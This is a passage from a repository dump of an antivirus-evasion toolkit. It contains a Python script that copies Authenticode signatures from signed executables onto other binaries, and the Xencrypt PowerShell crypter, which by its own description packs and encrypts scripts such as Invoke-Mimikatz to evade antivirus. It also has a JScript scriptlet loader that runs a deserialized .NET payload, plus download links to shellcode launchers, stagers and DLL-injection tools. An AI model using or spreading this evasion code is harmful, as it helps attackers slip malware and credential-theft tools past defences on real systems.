    flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
    flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
    flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
    flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
    if flItms['Magic'] == 0x20B:
        flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
        flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
        flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
        flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]

    else:
        flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
        flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
        flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
        flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
    flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0]  # zero
    flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
    # End Windows-Specific Fields of Optional Header
    # Begin Data Directories of Optional Header
    flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
    flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
    flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
    # ImportTable SIZE|LOC
    flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
    flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
    flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
    flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
    flItms['CertTableLOC'] = binary.tell()
    flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
    flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
    binary.close()
    return flItms


def copyCert(exe):
    flItms = gather_file_info_win(exe)

    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
        # not signed
        print("Input file Not signed!")
        sys.exit(-1)

    with open(exe, 'rb') as f:
        f.seek(flItms['CertLOC'], 0)
        cert = f.read(flItms['CertSize'])
    return cert


def writeCert(cert, exe, output):
    flItms = gather_file_info_win(exe)

    if not output:
        output = str(exe) + "_signed"

    shutil.copy2(exe, output)

    print("Output file: {0}".format(output))

    with open(exe, 'rb') as g:
        with open(output, 'wb') as f:
            f.write(g.read())
            f.seek(0)
            f.seek(flItms['CertTableLOC'], 0)
            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
            f.write(struct.pack("<I", len(cert)))
            f.seek(0, io.SEEK_END)
            f.write(cert)

    print("Signature appended. \nFIN.")


def outputCert(exe, output):
    cert = copyCert(exe)
    if not output:
        output = str(exe) + "_sig"

    print("Output file: {0}".format(output))

    open(output, 'wb').write(cert)

    print("Signature ripped. \nFIN.")


def check_sig(exe):
    flItms = gather_file_info_win(exe)

    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
        # not signed
        print("Inputfile Not signed!")
    else:
        print("Inputfile is signed!")


def truncate(exe, output):
    flItms = gather_file_info_win(exe)

    if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
        # not signed
        print("Inputfile Not signed!")
        sys.exit(-1)
    else:
        print("Inputfile is signed!")

    if not output:
        output = str(exe) + "_nosig"

    print("Output file: {0}".format(output))

    shutil.copy2(exe, output)

    with open(output, "r+b") as binary:
        print('Overwriting certificate table pointer and truncating binary')
        binary.seek(-flItms['CertSize'], io.SEEK_END)
        binary.truncate()
        binary.seek(flItms['CertTableLOC'], 0)
        binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")

    print("Signature removed. \nFIN.")


def signfile(exe, sigfile, output):
    flItms = gather_file_info_win(exe)

    cert = open(sigfile, 'rb').read()

    if not output:
        output = str(exe) + "_signed"

    shutil.copy2(exe, output)

    print("Output file: {0}".format(output))

    with open(exe, 'rb') as g:
        with open(output, 'wb') as f:
            f.write(g.read())
            f.seek(0)
            f.seek(flItms['CertTableLOC'], 0)
            f.write(struct.pack("<I", len(open(exe, 'rb').read())))
            f.write(struct.pack("<I", len(cert)))
            f.seek(0, io.SEEK_END)
            f.write(cert)
    print("Signature appended. \nFIN.")


if __name__ == "__main__":
    usage = 'usage: %prog [options]'
    parser = OptionParser()
    parser.add_option("-i", "--file", dest="inputfile",
                      help="input file", metavar="FILE")
    parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
                      help='rip signature off inputfile')
    parser.add_option('-a', '--add', dest='addsig', action='store_true',
                      help='add signature to targetfile')
    parser.add_option('-o', '--output', dest='outputfile',
                      help='output file')
    parser.add_option('-s', '--sig', dest='sigfile',
                      help='binary signature from disk')
    parser.add_option('-t', '--target', dest='targetfile',
                      help='file to append signature to')
    parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
                      help='file to check if signed; does not verify signature')
    parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
                      help='truncate signature (i.e. remove sig)')
    (options, args) = parser.parse_args()

    # rip signature
    # inputfile and rip to outputfile
    if options.inputfile and options.ripsig:
        print("Ripping signature to file!")
        outputCert(options.inputfile, options.outputfile)
        sys.exit()

    # copy from one to another
    # inputfile and rip to targetfile to outputfile
    if options.inputfile and options.targetfile:
        cert = copyCert(options.inputfile)
        writeCert(cert, options.targetfile, options.outputfile)
        sys.exit()

    # check signature
    # inputfile
    if options.inputfile and options.checksig:
        check_sig(options.inputfile)
        sys.exit()

    # add sig to target file
    if options.targetfile and options.sigfile:
        signfile(options.targetfile, options.sigfile, options.outputfile)
        sys.exit()

    # truncate
    if options.inputfile and options.truncate:
        truncate(options.inputfile, options.outputfile)
        sys.exit()

    parser.print_help()
    parser.error("You must do something!")

--------------------------------------------------------------------------------
/tools/mimikatz/xencrypt.ps1:
--------------------------------------------------------------------------------
# Xencrypt - PowerShell crypter
# Copyright (C) 2020 Xentropy ( @SamuelAnttila )
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.

Set-StrictMode -Version Latest
$ErrorActionPreference = "Stop"
$PSDefaultParameterValues['*:ErrorAction']='Stop'

function Create-Var() {
    # Variable length helps vary the length of the file generated
    # old: [guid]::NewGuid().ToString().Substring(24 + (Get-Random -Maximum 9))
    $set = "abcdefghijkmnopqrstuvwxyz"
    (1..(4 + (Get-Random -Maximum 6)) | %{ $set[(Get-Random -Minimum 0 -Maximum $set.Length)] } ) -join ''
}

function Invoke-Xencrypt {
<#
.SYNOPSIS

Invoke-Xencrypt takes any PowerShell script as an input and both packs and encrypts it to evade AV. It also lets you layer this recursively however many times you want in order to foil dynamic & heuristic detection.

.DESCRIPTION

Invoke-Xencrypt takes any PowerShell script as an input and both packs and encrypts it to evade AV.
The output script is highly randomized in order to make static analysis even more difficult.
It also lets you layer this recursively however many times you want in order to attempt to foil dynamic & heuristic detection.


.PARAMETER InFile
Specifies the script to obfuscate/encrypt.

.PARAMETER OutFile
Specifies the output script.

.PARAMETER Iterations
The number of times the PowerShell script will be packed & crypted recursively. Default is 2.

.EXAMPLE

PS> Invoke-Xencrypt -InFile Invoke-Mimikatz.ps1 -OutFile banana.ps1 -Iterations 3

.LINK

https://github.com/the-xentropy/xencrypt

#>

    [CmdletBinding()]
    Param (
        [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
        [string] $infile = $(Throw("-InFile is required")),
        [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
        [string] $outfile = $(Throw("-OutFile is required")),
        [Parameter(Mandatory=$false,ValueFromPipeline,ValueFromPipelineByPropertyName)]
        [string] $iterations = 2
    )
    Process {
        Write-Output "
Xencrypt Copyright (C) 2020 Xentropy ( @SamuelAnttila )
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions.
"

        # read
        Write-Output "[*] Reading '$($infile)' ..."
        $codebytes = [System.IO.File]::ReadAllBytes($infile)


        for ($i = 1; $i -le $iterations; $i++) {
            # Decide on encryption params ahead of time

            Write-Output "[*] Starting code layer ..."
            $paddingmodes = 'PKCS7','ISO10126','ANSIX923','Zeros'
            $paddingmode = $paddingmodes | Get-Random
            $ciphermodes = 'ECB','CBC'
            $ciphermode = $ciphermodes | Get-Random

            $keysizes = 128,192,256
            $keysize = $keysizes | Get-Random

            $compressiontypes = 'Gzip','Deflate'
            $compressiontype = $compressiontypes | Get-Random

            # compress
            Write-Output "[*] Compressing ..."
            [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
            if ($compressiontype -eq "Gzip") {
                $compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
            } elseif ( $compressiontype -eq "Deflate") {
                $compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress)
            }
            $compressionStream.Write( $codebytes, 0, $codebytes.Length )
            $compressionStream.Close()
            $output.Close()
            $compressedBytes = $output.ToArray()

            # generate key
            Write-Output "[*] Generating encryption key ..."
            $aesManaged = New-Object "System.Security.Cryptography.AesManaged"
            if ($ciphermode -eq 'CBC') {
                $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
            } elseif ($ciphermode -eq 'ECB') {
                $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB
            }

            if ($paddingmode -eq 'PKCS7') {
                $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
            } elseif ($paddingmode -eq 'ISO10126') {
                $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ISO10126
            } elseif ($paddingmode -eq 'ANSIX923') {
                $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ANSIX923
            } elseif ($paddingmode -eq 'Zeros') {
                $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
            }

            $aesManaged.BlockSize = 128
            $aesManaged.KeySize = 256
            $aesManaged.GenerateKey()
            $b64key = [System.Convert]::ToBase64String($aesManaged.Key)

            # encrypt
            Write-Output "[*] Encrypting ..."
            $encryptor = $aesManaged.CreateEncryptor()
            $encryptedData = $encryptor.TransformFinalBlock($compressedBytes, 0, $compressedBytes.Length);
            [byte[]] $fullData = $aesManaged.IV + $encryptedData
            $aesManaged.Dispose()
            $b64encrypted = [System.Convert]::ToBase64String($fullData)

            # write
            Write-Output "[*] Finalizing code layer ..."

            # now, randomize the order of any statements that we can to further increase variation

            $stub_template = ''

            $code_alternatives = @()
            $code_alternatives += '${2} = [System.Convert]::FromBase64String("{0}")' + "`r`n"
            $code_alternatives += '${3} = [System.Convert]::FromBase64String("{1}")' + "`r`n"
            $code_alternatives += '${4} = New-Object "System.Security.Cryptography.AesManaged"' + "`r`n"
            $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
            $stub_template += $code_alternatives_shuffled -join ''

            $code_alternatives = @()
            $code_alternatives += '${4}.Mode = [System.Security.Cryptography.CipherMode]::'+$ciphermode + "`r`n"
            $code_alternatives += '${4}.Padding = [System.Security.Cryptography.PaddingMode]::'+$paddingmode + "`r`n"
            $code_alternatives += '${4}.BlockSize = 128' + "`r`n"
            $code_alternatives += '${4}.KeySize = '+$keysize + "`n" + '${4}.Key = ${3}' + "`r`n"
            $code_alternatives += '${4}.IV = ${2}[0..15]' + "`r`n"
            $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
            $stub_template += $code_alternatives_shuffled -join ''

            $code_alternatives = @()
            $code_alternatives += '${6} = New-Object System.IO.MemoryStream(,${4}.CreateDecryptor().TransformFinalBlock(${2},16,${2}.Length-16))' + "`r`n"
            $code_alternatives += '${7} = New-Object System.IO.MemoryStream' + "`r`n"
            $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
            $stub_template += $code_alternatives_shuffled -join ''


            if ($compressiontype -eq "Gzip") {
                $stub_template += '${5} = New-Object System.IO.Compression.GzipStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
            } elseif ( $compressiontype -eq "Deflate") {
                $stub_template += '${5} = New-Object System.IO.Compression.DeflateStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
            }
            $stub_template += '${5}.CopyTo(${7})' + "`r`n"

            $code_alternatives = @()
            $code_alternatives += '${5}.Close()' + "`r`n"
            $code_alternatives += '${4}.Dispose()' + "`r`n"
            $code_alternatives += '${6}.Close()' + "`r`n"
            $code_alternatives += '${8} = [System.Text.Encoding]::UTF8.GetString(${7}.ToArray())' + "`r`n"
            $code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
            $stub_template += $code_alternatives_shuffled -join ''

            $stub_template += ('Invoke-Expression','IEX' | Get-Random)+'(${8})' + "`r`n"


            # it's ugly, but it beats concatenating each value manually.
            $code = $stub_template -f $b64encrypted, $b64key, (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var)
            $codebytes = [System.Text.Encoding]::UTF8.GetBytes($code)
        }
        Write-Output "[*] Writing '$($outfile)' ..."
        [System.IO.File]::WriteAllText($outfile,$code)
        Write-Output "[+] Done!"
    }
}

--------------------------------------------------------------------------------
/tools/mingw-w64-install.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mingw-w64-install.exe
--------------------------------------------------------------------------------
/tools/msfvenom-zsh-completion.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/msfvenom-zsh-completion.tar.gz
--------------------------------------------------------------------------------
/tools/pe_to_shellcode.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/pe_to_shellcode.zip
--------------------------------------------------------------------------------
/tools/powersct.sct:
--------------------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<package>
<component
  id="dummy">
<registration
  description="dummy"
  progid="dummy"
  version="1.00"
  remotable="True">
<script
  language="JScript"><![CDATA[function setversion() {
    var shell = new ActiveXObject('WScript.Shell');
    ver = 'v4.0.30319';
    try {
        shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\');
    } catch(e) {
        ver = 'v2.0.50727';
    }
    shell.Environment('Process')('COMPLUS_Version') = ver;

}
function debug(s) {}
function base64ToStream(b) {
    var enc = new ActiveXObject("System.Text.ASCIIEncoding");
    var length = enc.GetByteCount_2(b);
    var ba = enc.GetBytes_4(b);
    var transform = new
ActiveXObject("System.Security.Cryptography.FromBase64Transform"); 28 | ba = transform.TransformFinalBlock(ba, 0, length); 29 | var ms = new ActiveXObject("System.IO.MemoryStream"); 30 | ms.Write(ba, 0, (length / 4) * 3); 31 | ms.Position = 0; 32 | return ms; 33 | } 34 | 35 | var serialized_obj = "[base64 blob removed]"; 166 | var entry_class = 'TestClass'; 167 | 168 | try { 169 | setversion(); 170 | var stm = base64ToStream(serialized_obj); 171 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); 172 | var al = new ActiveXObject('System.Collections.ArrayList'); 173 | var n = fmt.SurrogateSelector; 174 | var d = fmt.Deserialize_2(stm); 175 | al.Add(n); 176 | var o = 
d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 177 | 178 | } catch (e) { 179 | debug(e.message); 180 | }]]></script> 181 | </registration> 182 | </component> 183 | </package> -------------------------------------------------------------------------------- /tools/py2exe-0.6.9.win32-py2.7.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/py2exe-0.6.9.win32-py2.7.exe -------------------------------------------------------------------------------- /tools/pyinstaller-3.5.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/pyinstaller-3.5.zip -------------------------------------------------------------------------------- /tools/sRDI.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/sRDI.zip -------------------------------------------------------------------------------- /tools/shellcode_launcher.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/shellcode_launcher.zip -------------------------------------------------------------------------------- /tools/stager.dll.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/stager.dll.zip -------------------------------------------------------------------------------- /tools/unicorn.tar.gz: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/unicorn.tar.gz -------------------------------------------------------------------------------- /tools/zirikatu.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/zirikatu.tar.gz -------------------------------------------------------------------------------- /tools/自动化dll注入工具-Dll(IAT).exe.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/自动化dll注入工具-Dll(IAT).exe.zip --------------------------------------------------------------------------------